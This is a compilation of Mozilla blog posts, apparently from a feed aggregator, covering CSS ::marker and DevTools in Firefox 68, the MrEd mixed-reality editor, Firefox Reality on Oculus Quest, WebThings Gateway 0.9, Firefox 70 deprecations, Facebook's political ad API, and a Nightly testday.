The ::marker pseudo-element lets you select the marker box of a list item. This will typically contain the list bullet, or a number. If you have ever used an image as a list bullet, or wrapped the text of a list item in a span in order to have different bullet and text colors, this pseudo-element is for you!

With the marker pseudo-element, you can target the bullet itself. The following code will turn the bullet on unordered lists to hot pink, and make the number on an ordered list item larger and blue.

ul ::marker {
  color: hotpink;
}

ol ::marker {
  color: blue;
  font-size: 200%;
}
An ordered and unordered list with styled bullets

With ::marker we can style our list markers

See the CodePen.

There are only a few CSS properties that may be used on ::marker. These include all font properties. Therefore you can change the font-size or family to be something different to the text. You can also color the bullets as shown above, and insert generated content.

Using ::marker on non-list items

A marker can only be shown on list items, however you can turn any element into a list-item by using display: list-item. In the example below I use ::marker, along with generated content and a CSS counter. This code outputs the step number before each h2 heading in my page, preceded by the word “step”. You can see the full example on CodePen.

h2 {
  display: list-item;
  counter-increment: h2-counter;
}

h2::marker {
  content: "Step: " counter(h2-counter) ". ";
}

If you take a look at the bug for the implementation of ::marker you will discover that it is 16 years old! You might wonder why a browser has 16 year old implementation bugs and feature requests sitting around. To find out more read through the issue, where you can discover that it wasn’t clear originally if the ::marker pseudo-element would make it into the spec.

There were some Mozilla-specific pseudo-elements that achieved the result developers were looking for with something like ::marker. The pseudo-elements ::-moz-list-bullet and ::-moz-list-number allowed for the styling of bullets and numbers respectively, using the -moz- vendor prefix.

The ::marker pseudo-element is standardized in CSS Lists Level 3 and CSS Pseudo-elements Level 4, and is currently implemented in Firefox 68 and Safari. Chrome has yet to implement ::marker. However, in most cases you should be able to use ::marker as an enhancement for those browsers which support it. You can allow the markers to fall back to the same color and size as the rest of the list text where it is not available.

CSS Fixes

It makes web developers sad when we run into a feature which is supported but works differently in different browsers. These interoperability issues are often caused by the sheer age of the web platform. In fact, some things were never fully specified in terms of how they should work. Many changes to our CSS specifications are made due to these interoperability issues. Developers depend on the browsers to update their implementations to match the clarified spec.

Most browser releases contain fixes for these issues, making the web platform incrementally better as there are fewer issues for you to run into when working with CSS. The latest Firefox release is no different – we’ve got fixes for the ch unit and for list numbering shipping.

Developer Tools

In addition to changes to the implementation of CSS in Firefox, Firefox 68 brings you some great new additions to Developer Tools to help you work with CSS.

In the Rules Panel, look for the new print styles button. This button allows you to toggle to the print styles for your document, making it easier to test a print stylesheet that you are working on.

The Print Styles button in the UI highlighted

The print styles icon is at the top right of the Rules Panel.


Staying with the Rules Panel, Firefox 68 shows an icon next to any invalid or unsupported CSS. If you have ever spent a lot of time puzzling over why something isn’t working, only to realise you made a typo in the property name, this will really help!

A property named flagged invalid in the console

In this example I have spelled padding as “pudding”. There is (sadly) no pudding property so it is highlighted as an error.


The console now shows more information about CSS errors and warnings. This includes a nodelist of places the property is used. You will need to click CSS in the filter bar to turn this on.

The console highlighting a CSS error

My pudding error is highlighted in the Console and I can see I used it on the body element.


So that’s my short roundup of the features you can start to use in Firefox 68. Take a look at the Firefox 68 release notes to get a full overview of all the changes and additions that Firefox 68 brings you.

The post New CSS Features in Firefox 68 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla VR BlogMrEd, an Experiment in Mixed Reality Editing

MrEd, an Experiment in Mixed Reality Editing

We are excited to tell you about MrEd, an experimental Mixed Reality editor we built in the spring to explore online editing of MR stories. What’s that? You haven’t heard of MrEd? Well, please allow us to explain.

MrEd, an Experiment in Mixed Reality Editing

For the past several months Blair, Anselm and I have been working on a visual editor for WebXR called the Mixed Reality Editor, or MrEd. We started with this simple premise: non-programmers should be able to create interactive stories and experiences in Mixed Reality without having to embrace the complexity of game engines and other general purpose tools. We are not the first people to tackle this challenge; from visual programming tools to simplified authoring environments, researchers and hobbyists have grappled with this problem for decades.

Looking beyond Mixed Reality, there have been notable successes in other media. In the late 1980s Apple created a ground breaking tool for the Macintosh called Hypercard. It let people visually build applications at a time when programming the Mac required Pascal or assembly. It did this by using the concrete metaphor of a stack of cards. Anything could be turned into a button that would jump the user to another card. Within this simple framework people were able to create eBooks, simple games, art, and other interactive applications. Hypercard’s reliance on declaring possibly large numbers of “visual moments” (cards) and using simple “programming” to move between them is one of the inspirations for MrEd.

We also took inspiration from Twine, a web-based tool for building interactive hypertext novels. In Twine, each moment in the story (seen on the screen) is defined as a passage in the editor as a mix of HTML content and very simple programming expressions executed when a passage is displayed, or when the reader follows a link. Like Hypercard, the author directly builds what the user sees, annotating it with small bits of code to manage the state of the story.

No matter what the medium — text, pictures, film, or MR — people want to tell stories. Mixed Reality needs tools to let people easily tell stories by focusing on the story, not by writing a simulation. It needs content focused tools for authors, not programmers. This is what MrEd tries to be.

Scenes Linked Together

At first glance, MrEd looks a lot like other 3D editors, such as Unity3D or Amazon Sumerian. There is a scene graph on the left, letting authors create scenes, add anchors, and attach content elements under them. Select an item in the graph or in the 3D windows, and a property pane appears on the right. Scripts can be attached to objects. And so on. You can position your objects in absolute space (good for VR) or relative to other objects using anchors. An anchor lets you do something like look for this poster in the real world, then position this text next to it, or look for this GPS location and put this model on it. Anchors aren't limited to basic placement; they can also express more semantically meaningful concepts, like find the floor and put this on it (we'll dig into this in another article).
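To make the anchor idea concrete, here is a purely hypothetical sketch of how an anchored element might be declared in a scene description. The field names and structure are our invention for illustration; MrEd's actual format may differ.

```javascript
// Hypothetical scene description; field names are illustrative only.
const scene = {
  name: "entrance",
  children: [
    {
      type: "anchor",
      // "Look for this poster in the real world..."
      target: { kind: "image", src: "poster.jpg" },
      children: [
        // "...then position this text next to it."
        { type: "text", text: "Welcome!", position: { x: 0.3, y: 0, z: 0 } },
      ],
    },
  ],
};

console.log(scene.children[0].children[0].text); // "Welcome!"
```

The anchor groups its children, so everything under it is positioned relative to whatever the anchor finds in the real world.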

Dig into the scene graph on the left, and differences appear. Instead of editing a single world or game level, MrEd uses the metaphor of a series of scenes (inspired by Twine's passages and HyperCard's cards). All scenes in the project are listed, with each scene defining what you see at any given point: shapes, 3D models, images, 2D text, and sounds. You can add interactivity by attaching behaviors to objects for things like 'click to navigate' and 'spin around'. The story advances by moving from scene to scene; code to keep track of story state is typically executed on these scene transitions, as in HyperCard and Twine. Where most 3D editors force users to build simulations for their experiences, MrEd lets authors create stories that feel more like "3D flip-books". Within a scene, the individual elements can be animated, move around, and react to the user (via scripts), but the story progresses by moving from scene to scene. While it is possible to create complex individual scenes that begin to feel like a Unity scene, simple stories can be told through sequences of simple scenes.

We built MrEd on Glitch.com, a free web-based code editing and hosting service. With a little hacking we were able to put an entire IDE and document server into a glitch. This means anyone can share and remix their creations with others.

One key feature of MrEd is that it is built on top of a CRDT data structure to enable editing the same project on multiple devices simultaneously. This feature is critical for Mixed Reality tools because you are often switching between devices during development; the networked CRDT underpinnings also mean that logging messages from any device appear in any open editor console viewing that project, simplifying distributed development. We will tell you more details about the CRDT and Glitch in future posts.
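To give a flavor of why a CRDT helps here, the sketch below implements a minimal last-writer-wins map. This is not MrEd's actual data structure (we'll cover that in a future post); it just illustrates how concurrent edits from two devices can merge in any order and still converge.

```javascript
// Minimal last-writer-wins (LWW) map: a toy CRDT, not MrEd's real one.
class LWWMap {
  constructor() {
    this.entries = new Map(); // key -> { value, timestamp, device }
  }

  // Apply a local or remote write. Ties on timestamp are broken by
  // device id, so every replica resolves conflicts identically.
  set(key, value, timestamp, device) {
    const cur = this.entries.get(key);
    if (!cur ||
        timestamp > cur.timestamp ||
        (timestamp === cur.timestamp && device > cur.device)) {
      this.entries.set(key, { value, timestamp, device });
    }
  }

  get(key) {
    const e = this.entries.get(key);
    return e ? e.value : undefined;
  }

  // Merging is just replaying the other replica's entries.
  merge(other) {
    for (const [k, e] of other.entries) {
      this.set(k, e.value, e.timestamp, e.device);
    }
  }
}

// Two devices edit the same scene property concurrently...
const phone = new LWWMap();
const laptop = new LWWMap();
phone.set("scene1.title", "Lobby", 1, "phone");
laptop.set("scene1.title", "Entrance", 2, "laptop");

// ...and after merging in either direction, both converge.
phone.merge(laptop);
laptop.merge(phone);
console.log(phone.get("scene1.title")); // "Entrance"
```

Because merges commute, it doesn't matter which device syncs first, which is exactly the property you want when hopping between a laptop and a headset mid-edit.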

We ran a two week class with a group of younger students in Atlanta using MrEd. The students were very interested in telling stories about their school, situating content in space around the buildings, and often using memes and ideas that were popular for them. We collected feedback on features, bugs and improvements and learned a lot from how the students wanted to use our tool.

Lessons Learned

As I said, this was an experiment, and no experiment is complete without reporting on what we learned. So what did we learn? A lot! And we are going to share it with you over the next couple of blog posts.

First, we learned that the idea of building a 3D story from a sequence of simple scenes works for novice MR authors: direct manipulation with concrete metaphors, navigation between scenes as a way of telling stories, and the ability to easily import images and media from other places. The students were able to figure it out. Even more complex AR concepts like image targets and geospatial anchors were understandable when turned into concrete objects.

MrEd’s behavior scripts are each a separate JavaScript file, and MrEd generates the property sheet from the definition of the behavior in the file, much like Unity’s behaviors. Compartmentalizing them in separate files means they are easy to update and share, and (like Unity) simple scripts are a great way to add interactivity without requiring complex coding. We leveraged JavaScript’s runtime code parsing and execution to support scripts with simple code snippets as parameters (e.g., when the user finds a clue by getting close to it, a proximity behavior can set a global state flag to true, without requiring a new script to be written), while still giving authors the option to drop down to JavaScript when necessary.
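As a sketch of this idea, a behavior file might declare both its editable parameters and its per-frame function in one place, so the editor can build a property sheet by reading the parameter definitions. The names below are assumptions for illustration, not MrEd's actual API.

```javascript
// Hypothetical MrEd-style behavior script; names are illustrative only.
// One small file declares the parameters (which an editor could read
// to generate its property sheet) and the function run each frame.
const properties = {
  speed: { type: "number", default: 90 }, // degrees per second
};

// Called by the runtime every frame with elapsed time dt in seconds.
function spinAround(object, props, dt) {
  object.rotation.y += (props.speed * Math.PI / 180) * dt;
}

// Simulate half a second at 90 deg/s: the object turns 45 degrees.
const obj = { rotation: { y: 0 } };
spinAround(obj, { speed: properties.speed.default }, 0.5);
console.log(obj.rotation.y); // Math.PI / 4
```

Keeping the parameter schema next to the code is what makes the "one file per behavior" model easy to update and share.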

Second, we learned a lot about building such a tool. We really pushed Glitch to the limit, including using undocumented APIs, to create an IDE and doc server that are entirely remixable. We also built a custom CRDT to enable shared editing. Being able to jump back and forth between a full 2D browser with a keyboard and the WebXR Viewer running on an ARKit-enabled iPhone is really powerful. The CRDT implementation makes this type of real-time shared editing possible.

Why we are done

MrEd was an experiment in whether XR metaphors can map cleanly to a Hypercard-like visual tool. We are very happy to report that the answer is yes. Now that our experiment is over we are releasing it as open source, and have designed it to run in perpetuity on Glitch. While we plan to do some code updates for bug fixes and supporting the final WebXR 1.0 spec, we have no current plans to add new features.

Building a community around a new platform is difficult and takes a long time. We realized that our charter isn’t to create platforms and communities. Our charter is to help more people make Mixed Reality experiences on the web. It would be far better for us to help existing platforms add WebXR than for us to build a new community around a new tool.

Of course the source is open and freely usable on GitHub. And of course anyone can continue to use it on Glitch, or host their own copy. Open projects never truly end, but our work on it is complete. We will continue to do updates as the WebXR spec approaches 1.0, but there won’t be any major changes.

Next Steps

We are going to polish up the UI and fix some remaining bugs. MrEd will remain fully usable on Glitch, and hackable on GitHub. We also want to pull some of the more useful chunks into separate components, such as the editing framework and the CRDT implementation. And most importantly, we are going to document everything we learned over the next few weeks in a series of blog posts.

If you are interested in integrating WebXR into your own rapid prototyping / educational programming platform, then please let us know. We are very happy to help you.

You can try MrEd live by remixing the Glitch and setting a password in the .env file. You can get the source from the main MrEd GitHub repo, and the source for the glitch from the base glitch repo.

Mozilla VR Blog: Firefox Reality for Oculus Quest

Firefox Reality for Oculus Quest

We are excited to announce that Firefox Reality is now available for the Oculus Quest!

Following our releases for other 6DoF headsets including the HTC Vive Focus Plus and Lenovo Mirage, we are delighted to bring the Firefox Reality VR web browsing experience to Oculus' newest headset.

Whether you’re watching immersive video or meeting up with friends in Mozilla Hubs, Firefox Reality takes advantage of the Oculus Quest’s boost in performance and capabilities to deliver the best VR web browsing experience. Try the new featured content on the FxR home page or build your own to see what you can do in the next generation of standalone virtual reality headsets.

Enhanced Tracking Protection Blocks Sites from Tracking You
To protect our users from the pervasive tracking and collection of personal data by ad networks and tech companies, Firefox Reality has Enhanced Tracking Protection enabled by default. We strongly believe privacy shouldn’t be relegated to optional settings. As an added bonus, these protections work in the background and actually increase the speed of the browser.

Firefox Reality is available in 10 different languages, including Japanese, Korean, Simplified Chinese and Traditional Chinese, with more on the way. You can also use your voice to search the web instead of typing, making it faster and easier to get where you want to go.

Stay tuned in the coming months as we roll out support for the nearly finalized WebXR specification, multi-window browsing, bookmarks sync, additional language support and other exciting new features.

Like all Firefox browser products, Firefox Reality is available for free in the Oculus Quest store.

For more information: https://mixedreality.mozilla.org/firefox-reality/

hacks.mozilla.org: WebThings Gateway for Wireless Routers

Wireless Routers

In April we announced that the Mozilla IoT team had been working on evolving WebThings Gateway into a full software distribution for consumer wireless routers.

Today, with the 0.9 release, we’re happy to announce the availability of the first experimental builds for our first target router hardware, the Turris Omnia.


Turris Omnia wireless router. Source: turris.cz

These builds are based on the open source OpenWrt operating system. They feature a new first-time setup experience which enables you to configure the gateway as a router and Wi-Fi access point itself, rather than connecting to an existing Wi-Fi network.

Router first time setup

So far, these experimental builds only offer extremely basic router configuration and are not ready to replace your existing wireless router. This is just our first step along the path to creating a full software distribution for wireless routers.

Router network settings

We’re planning to add support for other wireless routers and router developer boards in the near future. We want to ensure that the user community can access a range of affordable developer hardware.

Raspberry Pi 4

As well as these new OpenWrt builds for routers, we will continue to support the existing Raspbian-based builds for the Raspberry Pi. In fact, the 0.9 release is also the first version of WebThings Gateway to support the new Raspberry Pi 4. You can now find a handy download link on the Raspberry Pi website.

Raspberry Pi 4 Model B

Raspberry Pi 4 Model B. Source: raspberrypi.org

Notifier Add-ons

Another feature landing in the 0.9 release is a new type of add-on called notifier add-ons.


In previous versions of the gateway, the only way you could be notified of events was via browser push notifications. Unfortunately, this is not supported by all browsers, nor is it always the most convenient notification mechanism for users.

A workaround was available by creating add-ons with basic “send notification” actions to implement different types of notifications. However, these required the user to add “things” to their gateway which didn’t represent actual devices, and the actions had to be hard-coded in the add-on’s configuration.

To remedy this, we have introduced notifier add-ons. Essentially, a notifier creates a set of “outlets”, each of which can be used as an output for a rule. For example, you can now set up a rule to send you an SMS or an email when motion is detected in your home. Notifiers can be configured with a title, a message and a priority level. This allows users to be reached where and how they want, with a message and priority that makes sense to them.
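The sketch below illustrates the outlet concept in plain JavaScript. It is not the actual gateway-addon API, just a simplified model of how a notifier exposes an outlet that a rule can drive with a user-configured title, message, and priority level.

```javascript
// Simplified model of a notifier outlet; not the real gateway-addon API.
class EmailOutlet {
  constructor(address) {
    this.address = address;
    this.sent = []; // a real outlet would send email; we just record
  }

  // The interface a rule's output needs: title, message, level.
  notify(title, message, level) {
    this.sent.push({ to: this.address, title, message, level });
  }
}

const outlet = new EmailOutlet("me@example.com");

// A rule like "when motion is detected, email me" reduces to calling
// the chosen outlet with the user's configured values.
function onMotionDetected() {
  outlet.notify("Home alert", "Motion detected in the living room", "high");
}

onMotionDetected();
console.log(outlet.sent.length); // 1
```

Because every outlet exposes the same small interface, the rules engine doesn't care whether the output is an email, an SMS, or something else entirely.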

Rule with email notification

API Changes

For developers, the 0.9 release of the WebThings Gateway and the 0.12 release of the WebThings Framework libraries also bring some small changes to Thing Descriptions. These changes bring us more closely in line with the latest W3C drafts.

One small difference to be aware of is that “name” is now called “title”. There are also some experimental new base, security and securityDefinitions properties of the Thing Descriptions exposed by the gateway, which are still under active discussion at the W3C.
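As a simplified sketch of what this looks like in practice, a Thing Description exposed by the gateway might now resemble the following (the exact members produced by a given gateway may differ, and the security-related fields shown here are the experimental ones still under discussion):

```json
{
  "title": "Motion Sensor",
  "base": "https://gateway.local/things/motion-sensor/",
  "securityDefinitions": {
    "oauth2_sc": { "scheme": "oauth2" }
  },
  "security": "oauth2_sc",
  "properties": {
    "motion": { "type": "boolean" }
  }
}
```

The key rename to notice is the top-level "title", which earlier gateway releases called "name".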

Give it a try!

We invite you to download the new WebThings Gateway 0.9 and continue to build your own web things with the latest WebThings Framework libraries. If you already have WebThings Gateway installed on a Raspberry Pi, it should update itself automatically.

As always, we welcome your feedback on Discourse. Please submit issues and pull requests on GitHub.

The post WebThings Gateway for Wireless Routers appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Add-ons Blog: Upcoming deprecations in Firefox 70

Several planned code deprecations for Firefox 70, currently available on the Nightly pre-release channel, may impact extension and theme developers. Firefox 70 will be released on October 22, 2019.

Aliased theme properties to be removed

In Firefox 65, we started deprecating the aliased theme properties accentcolor, textcolor, and headerURL. These properties will be removed in Firefox 70.

Themes listed on addons.mozilla.org (AMO) will be automatically updated to use supported properties. Most themes were updated back in April, but new themes have been created using the deprecated properties. If your theme is not listed on AMO, or if you are the developer of a dynamic theme, please update your theme’s manifest.json to use the supported properties.

  • For accentcolor, please use frame
  • For headerURL, please use theme_frame
  • For textcolor, please use tab_background_text
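For instance, a minimal static theme's manifest.json using the supported properties would look like this (file names and colors are placeholders):

```json
{
  "manifest_version": 2,
  "name": "My Theme",
  "version": "1.0",
  "theme": {
    "images": {
      "theme_frame": "header.png"
    },
    "colors": {
      "frame": "#4a90d9",
      "tab_background_text": "#ffffff"
    }
  }
}
```

If your manifest still contains accentcolor, textcolor, or headerURL, swapping in the keys above is the whole migration.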

JavaScript deprecations

In Firefox 70, the non-standard, Firefox-specific Array generic methods introduced with JavaScript 1.6 will be considered deprecated and scheduled for removal in the near future. For more information about which generics will be removed and suggested alternatives, please see the Firefox Site Compatibility blog.

The Site Compatibility working group also intends to remove the non-standard prototype toSource and uneval by the end of 2019.
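Code relying on these non-standard features can usually be rewritten with standard equivalents, for example:

```javascript
const str = "abc";

// Deprecated, Firefox-only Array generic (scheduled for removal):
//   Array.map(str, c => c.toUpperCase());
// Standard replacement that works in all browsers:
const upper = Array.from(str, c => c.toUpperCase());
console.log(upper); // ["A", "B", "C"]

// Deprecated, Firefox-only serialization:
//   ({ x: 1 }).toSource();  or  uneval({ x: 1 })
// JSON.stringify covers most of the same use cases:
const json = JSON.stringify({ x: 1 });
console.log(json); // {"x":1}
```

Note that JSON.stringify is not a drop-in replacement for every toSource use (it cannot serialize functions, for example), but it handles the common case of plain data.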

The post Upcoming deprecations in Firefox 70 appeared first on Mozilla Add-ons Blog.

The Mozilla Blog: Empowering voters to combat election manipulation

For the last year, Mozilla has been looking for ways to empower voters in light of the shifts in election dynamics caused by the internet and online advertising. This work included our participation in the EU’s Code of Practice on Disinformation to push for change in the industry. It also led to the launch of the Firefox EU Elections toolkit, which gave people information on the voting process, explained how tracking and opaque online advertising influence their voting behavior, and showed how they can easily protect themselves.

We also had hoped to lend our technical expertise to create an analysis dashboard that would help researchers and journalists monitor the elections. The dashboard would gather data on the political ads running on various platforms and provide a concise “behind the scenes” look at how these ads were shared and targeted.

But to achieve this we needed the platforms to follow through on their own commitment to make the data available through their Ad Archive APIs.

Here’s what happened.

Platforms didn’t supply sufficient data

On March 29, Facebook began releasing its political ad data through a publicly available API. We quickly concluded the API was inadequate.

  • Targeting information was not available.
  • Bulk data access was not offered.
  • Data wasn’t tagged properly.
  • Identical searches would produce wildly differing results.

The state of the API made it nearly impossible to extract the data needed to populate the dashboard we were hoping to create to make this information more accessible.

Although Google didn’t provide the targeting criteria advertisers use on the platform, it did provide access to the data in a format that allowed for real research and analysis.

That was not the case for Facebook.

So then what?

It took the entire month of April to figure out ways to work within, or rather around, the API to collect any information about the political ads running on the Facebook platform.

After several weeks, hundreds of hours, and thousands of keystrokes, the Mozilla team created the EU Ad Transparency Reports. The reports contained aggregated statistics on spending and impressions about political ads on Facebook, Instagram, Google, and YouTube.

While this was not the dynamic tool we had envisioned at the beginning of this journey, we hoped it would help.

But despite our best efforts to help Facebook debug their system, the API broke again from May 18 through May 26, making it impossible to use the API and generate any reports in the last days leading up to the elections.

All of this was documented through dozens of bug reports provided to Facebook, identifying ways the API needed to be fixed.

A Roadmap for Facebook

Ultimately our contribution to this effort ended up looking very different than what we had first set out to do. Instead of a tool, we have detailed documentation of every time the API failed and every roadblock encountered and a series of tips and tricks to help others use the API.

This documentation provides Facebook a clear roadmap to make the necessary improvements for a functioning and useful API before the next election takes place. The EU elections have passed, but the need for political messaging transparency has not.

In fact, important elections are expected to take place almost every month until the end of the year and Facebook has recently rolled this tool out globally.

We need Facebook to be better. We need an API that actually helps – not hinders – researchers and journalists uncover who is buying ads, the way these ads are being targeted and to whom they’re being served. It’s this important work that informs the public and policymakers about the nature and consequences of misinformation.

This is too important to get wrong. That is why we plan to continue our work on this matter, and to keep working with those pushing to shine a light on how online advertising impacts elections.

The post Empowering voters to combat election manipulation appeared first on The Mozilla Blog.

QMO: Firefox Nightly 70 Testday Results

Hello Mozillians!

As you may already know, last Friday – July 19th – we held a new Testday event, for Firefox Nightly 70.

Thank you all for helping us make Mozilla a better place: gaby2300, maria plachkova and Fernando noelonassis.


Results:

– several test cases executed for Fission

– 1 bug verified: 1564267

Thanks for another successful testday 🙂

We hope to see you all in our next events, all the details will be posted on QMO!